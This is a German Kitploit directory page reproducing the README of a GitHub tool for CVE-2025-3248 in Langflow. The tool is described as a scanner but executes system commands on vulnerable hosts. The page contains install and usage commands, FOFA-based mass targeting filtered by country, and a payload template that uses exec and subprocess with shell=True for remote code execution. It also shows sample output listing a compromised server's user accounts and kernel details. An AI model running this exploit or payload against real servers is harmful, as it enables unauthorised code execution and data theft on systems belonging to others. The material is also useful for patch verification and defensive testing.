Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-3248 — Ein Schwachstellen-Scanner für CVE-2025-3248 in Langflow-Anwendungen. Ein Tool zum Scannen der Schwachstelle CVE-2025-3248 in Langflow-Anwendungen. | Kitploit
Tools/GitHubGitHub/xuemian168/cve-2025-3248
AufklärungSchwachstellenscannerExploitationWebanwendungs-ExploitationInformationsbeschaffungCommand and Control
GitHubxuemian168/cve-2025-3248

CVE-2025-3248

Ein Schwachstellen-Scanner für CVE-2025-3248 in Langflow-Anwendungen. Ein Tool zum Scannen der Schwachstelle CVE-2025-3248 in Langflow-Anwendungen.

Repository anzeigen
1021vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

中文 | Englisch

Langflow-Schwachstellenscanner

Ein Schwachstellenscanner für CVE-2025-3248 in Langflow-Anwendungen.

Funktionen

  • Einzelnes Ziel oder mehrere Ziele mit FOFA scannen
  • Systembefehle auf verwundbaren Zielen ausführen
  • Systeminformationen abrufen
  • Unterstützung für benutzerdefinierte Payloads
  • Fortschrittsbalken für FOFA-Scans
  • Schöne CLI-Oberfläche

Installation

  1. Repository klonen:
root@kitploit:~
git clone https://github.com/xuemian168/CVE-2025-3248.git
cd CVE-2025-3248/
  1. Abhängigkeiten installieren:
root@kitploit:~
python3 -m venv venv
source venv/bin/active
pip install -r requirements.txt
  1. Umgebungsdatei bearbeiten (optional)
root@kitploit:~
# After you finish editing
mv .env.example .env

Verwendung

Einzelziel-Scan

root@kitploit:~
python main.py -t https://target.com

Verwendung der FOFA-API

root@kitploit:~
python main.py --fofa-email [email protected] --fofa-key your_api_key

Zusätzliche Optionen

  • -t, --target: Ziel-URL zum Scannen
  • --fofa-email: FOFA-API-E-Mail
  • --fofa-key: FOFA-API-Schlüssel
  • --fofa-query: FOFA-Suchabfrage (Standard: 'app="LOGSPACE-LangFlow"')
  • --country: Ergebnisse nach Ländercode filtern (z.B. CN, US)
  • --max-pages: Maximale Anzahl abzurufender FOFA-Seiten (Standard: 5)
  • --page-size: Ergebnisse pro Seite (Standard: 100)
  • --timeout: Anforderungs-Timeout in Sekunden (Standard: 10)
  • --no-verify: SSL-Verifizierung deaktivieren
  • --threads: Anzahl der Threads für paralleles Scannen (Standard: 5)
  • -f, --file: Benutzerdefinierte Python-Datei als Payload verwenden

Benutzerdefinierte Payloads

Sie können benutzerdefinierte Payloads erstellen, indem Sie eine Python-Datei erstellen:

root@kitploit:~
def test(cd=exec('raise Exception(__import__("subprocess").check_output("your_command", shell=True))')):
    pass

Dann verwenden Sie es mit:

root@kitploit:~
python main.py -t https://target.com -f your_payload.py

Beispielausgabe

root@kitploit:~
    [+] User Accounts:
        root            UID:0      GID:0      Home:/root                Shell:/bin/bash
        daemon          UID:1      GID:1      Home:/usr/sbin            Shell:/usr/sbin/nologin
        bin             UID:2      GID:2      Home:/bin                 Shell:/usr/sbin/nologin
        sys             UID:3      GID:3      Home:/dev                 Shell:/usr/sbin/nologin
        sync            UID:4      GID:65534  Home:/bin                 Shell:/bin/sync
        games           UID:5      GID:60     Home:/usr/games           Shell:/usr/sbin/nologin
        man             UID:6      GID:12     Home:/var/cache/man       Shell:/usr/sbin/nologin
        lp              UID:7      GID:7      Home:/var/spool/lpd       Shell:/usr/sbin/nologin
        mail            UID:8      GID:8      Home:/var/mail            Shell:/usr/sbin/nologin
        news            UID:9      GID:9      Home:/var/spool/news      Shell:/usr/sbin/nologin
        uucp            UID:10     GID:10     Home:/var/spool/uucp      Shell:/usr/sbin/nologin
        proxy           UID:13     GID:13     Home:/bin                 Shell:/usr/sbin/nologin
        www-data        UID:33     GID:33     Home:/var/www             Shell:/usr/sbin/nologin
        backup          UID:34     GID:34     Home:/var/backups         Shell:/usr/sbin/nologin
        list            UID:38     GID:38     Home:/var/list            Shell:/usr/sbin/nologin
        irc             UID:39     GID:39     Home:/run/ircd            Shell:/usr/sbin/nologin
        _apt            UID:42     GID:65534  Home:/nonexistent         Shell:/usr/sbin/nologin
        nobody          UID:65534  GID:65534  Home:/nonexistent         Shell:/usr/sbin/nologin
        user            UID:1000   GID:0      Home:/app/data            Shell:/bin/sh
root@kitploit:~
    [+] System Details:
        Linux ********** 6.8.0-1020-aws #22-Ubuntu SMP Thu Nov 21 **:**:** UTC 2025 x86_64 GNU/Linux

Haftungsausschluss

⚠️ Haftungsausschluss Dieses Tool dient nur legalen Zwecken. Es wurde für Bildungszwecke, interne Unternehmenssicherheitstests oder die Nutzung in autorisierten Umgebungen entwickelt. Die Verwendung dieses Tools auf nicht autorisierten Systemen, Netzwerken oder Geräten ist strengstens untersagt, da dies gegen geltende Gesetze und Vorschriften verstoßen könnte.

Benutzer tragen die volle rechtliche Verantwortung für ihre Handlungen. Der Autor und die Mitwirkenden übernehmen keine Haftung für Verluste, Datenlecks oder rechtliche Konsequenzen, die durch unsachgemäße Verwendung dieses Tools entstehen.

⚠️ Nicht für illegale Angriffe verwenden. Versuchen Sie nicht, dieses Tool auf nicht autorisierten Systemen zu installieren oder auszuführen.

Referenzen

  • https://github.com/langflow-ai/langflow/releases/tag/1.3.0
  • https://github.com/langflow-ai/langflow/pull/6911
  • https://www.cve.org/cverecord?id=CVE-2025-3248

Lizenz

MIT-Lizenz

Tool herunterladen